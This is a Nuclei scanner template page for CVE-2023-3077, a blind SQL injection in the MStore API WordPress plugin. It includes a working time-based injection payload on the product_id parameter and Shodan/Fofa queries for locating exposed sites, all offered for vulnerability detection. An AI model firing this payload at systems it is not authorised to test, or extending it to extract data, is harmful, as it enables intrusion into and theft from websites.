MStore API < 3.9.8 - SQL Injection
ID: CVE-2023-3077
Severity: critical
Author: DhiyaneshDK
Tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui
Description
Section titled “Description”The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.
YAML Source
Section titled “YAML Source”id: CVE-2023-3077
info: name: MStore API < 3.9.8 - SQL Injection author: DhiyaneshDK severity: critical description: | The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter. impact: | Allows an attacker to extract sensitive data from the database remediation: | Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability reference: - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432 - https://nvd.nist.gov/vuln/detail/CVE-2023-3077 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3077 epss-score: 0.00148 epss-percentile: 0.50816 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: inspireui product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireuiflow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
matchers: - type: dsl internal: true dsl: - 'status_code == 200' - 'contains(body, "MStore API")' condition: and
- raw: - | @timeout: 15s GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' condition: and# digest: 480a00453043021f2529439a06449f6622010f36352e94b6b4cd7314c6712735224329d9dc690502207cf47225608a1be2482a437732378411a3c870b22ba0d351cdef79f476a68fc5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-3077.yaml"